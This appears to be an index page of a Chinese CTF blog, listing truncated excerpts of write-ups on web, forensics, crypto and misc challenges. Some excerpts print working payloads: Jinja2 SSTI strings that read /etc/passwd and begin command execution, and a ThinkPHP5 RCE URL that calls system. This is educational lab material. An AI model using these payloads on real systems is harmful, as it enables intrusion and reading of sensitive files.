在/action.php这里抓包可以发现有一个secr3t.php 打开之后进行代码审计： 首先我直接?file=flag.php了一下，页…

题目下载 strings/binwalk/file都试过啦。。没有什么发现 看wp才晓得的蜜汁规律。。需要和0x33异或： data = open("photo.dat",'rb') strs = data.read() flag = open("flag.jpg",'ab+') for i in strs: flag.write(bytes([i ^ 0x33])) 得到一张图片： 接下…

在源代码这里发现了好玩的： 点进去瞅一下哈： 根据提示，改一下Referer，改一下UA，改一下XFF就出来了，意外的简单。 因为最近忙好久没更新博客了，也算记录一下。

先注册，然后登录了，提示admin账号才给flag： 查看源码发现action.php?callback=getInfo 这个页面存在当前用户的csrftoken 御剑扫到了可疑的东西： 访问test.php得到E5xqqsvHoznsjlfDm5ryLg== 访问action.php?callback=getInfo，抓包把username改为E5xqqsvH…

学习： 从 flask+jinjia2 认识 SSTI 服务端模板注入 | AbelChe's Blog Tokyo Westerns CTF 2018 WEB Wp | 码农网 题目里只给出了一个源代码： import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route(…

[1] {{1+1}}测试，存在模板注入： [2] {{config.items()}} 可以查看服务器的配置信息： [3] 读取password信息： {{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}} [4] 命令执行，（ls列出文件）： {% for c in [].__class__.__base__.…

记笔记，对区块链不是很了解，还是萌萌qwq。 学习参考：区块链与51%算力攻击&2018-DDCTF-mini blockchain 51% （双花）攻击： 在比特币网络里，你有多少钱，不是你说了算，而是大家说了算，每个人都是公证人。”基于算力证明进行维护的比特币网络一直以来有一…

破译下面的密文： TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 WFLW0K510 1X LZW54 WF5KL50Y 2S4L0W4KZ52 L1 50U14214SLW X5L0WKK S0V TSK7WLTS88 VWNW8129W0L 50 W8W9W0LS4G, 95VV8W S0V Z5YZ KUZ118K SU41KK UZ50S.LZ…

foremost文件提取后有一个zip，把后缀改成apk。 JADX下载 详细过程参考这篇教程解压后选择lib/jadx-gui-1.0.0.jar，把文件拖入即可看到flag。

题目描述：Tornado 框架 /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename))根据题目描述可知使用了tornoda框架，进去后根据提示信息render和需要cookie_secret猜测会存在注入，把签名随便改一下就会跳转…

该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行…

/* 将ascii码表打出来，并观察对应关系 */ #include <stdio.h> #include <stdlib.h> int main() { for (int i = 1; i <= 127; i++) { if (i == 7) { printf("%d \\a\t", i); continue; } if (i == 8) { printf("%d 退格\r\n", i); continue; } if (i == 9) { printf("%d \\t\t",</stdlib.h></stdio.h>…

题目描述： Left?Middle?No，I want right！（flag is right？！） 题目下载 给了一个打不开的图片，用notepad打开发现首位有奇怪的十六进制数，选中转换为ascii，上半部分是f09e54c1bad2x38mvyg7wzlsuhkijnop，下半部分是905e4c1fax328mdyvg7wbsuhklijznop…

题目下载 一个普通的PNG图片。常规操作梭完之后没有任何发现。。 学习到了一种新的图片格式：BPG BPG格式，全称“Better Portable Graphics”（更好的便携式图像），它是一个声称比现时最流行的JPEG压缩格式更优秀的图像压缩方案，由法国的程序员法布里斯·贝拉…

【 不仅仅是RSA 】 通过这个网站得到C1和C2的值 C1:4314251881242803343641258350847424240197348270934376293792054938860756265727535163218661012756264314717591117355736219880127534927494986120542485721347351 C2:485162209351525800948941613977942…

Misc - Advertising for Marriage 题目下载 下载下来是一个后缀名为raw的文件。通过学习文章得知： 内存取证三项CTF赛题详解 - FreeBuf互联网安全新媒体平台 CTF中文件包含的一些技巧 - i春秋学院 - 博客园 这种raw文件是内存取证工具Dumpit提取内存生成的内…

WEB部分 【Romance签到】 查看源码href="source.php" 找到hint.php 打开是： ♭‖§∮♯♭‖§∮♬♭‖§§♫♭‖§∮§♭‖§♩§♭‖♯♬¶♭‖§§♫♭‖§§¶♭‖♯¶§♭‖♯¶♫♭‖§∮♭♭‖§§♫♭‖§§♬♭‖♯♬♪♭‖♯¶♪♭‖♯¶‖♭‖♯¶♯♭‖♯♬♬♭‖♯♬♪♭‖♯¶♯♭‖♯¶♯♭‖♯¶∮♭‖§∮♭♭‖♯♬♪♭‖§§♬♭‖♯¶§♭‖♯¶‖♭‖§§♬♭‖♯♬♪♭‖§§♫♭‖♯¶♪♭‖♯¶♫♭‖♯¶§♭‖…

题目下载 用wireshark打开，发现有80个流。3401到4400的流记为0 3400到4400的流记为1 如图所示： 这样 前八个就为：01001000 即为大写“H”，以此类推。 最后flag就为： Heisenberg

ThinkPHP5.x rec 漏洞分析与复现通过参考这篇文章，得到payload ?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir 又因为只可以执行linux命令，命令行直接运行PHP代码： php -r "phpinfo();" 所以这道题的pa…

题目下载 这题打开是这样的： 0529242a631234122d2b36697f13272c207f2021283a6b0c7908 2f28202a302029142c653f3c7f2a2636273e3f2d653e25217908 322921780c3a235b3c2c3f207f372e21733a3a2b37263b313012 2f6c363b2b312b1e64651b6537222e37377f2020242b6b2c2d5d…

查看添加更新源 编辑sources.list,将kali更新源加入其中sudo vim /etc/apt/sources.list 国内更新源 #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free c…

Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计，互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后，攻击者可以通过发送POST请求在目标系统中执行任意命令…